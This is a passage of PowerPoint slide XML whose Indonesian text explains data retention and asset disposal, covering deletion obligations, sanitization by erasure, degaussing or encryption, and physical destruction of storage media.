            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Undang-Undang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Portabilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Akuntabilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Asuransi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Kesehatan (HIPAA), juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengharuskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penghapusan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemusnahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diminta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>subjek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Memusnahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>usang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketinggalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zaman </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkala</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemanfaatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efisien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menonaktifkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hancurkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kembali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pembuangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Aset</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembuangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penonaktifan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berfokus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penanganan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akhir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siklus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hidupnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meliputi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal-hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Sanitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-Mengacu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghapus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> media </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembobolan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data. Proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penghapusan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, degaussing, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipulihkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sanitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kembali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyumbangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peraturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pemusnahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-Melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penghapusan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
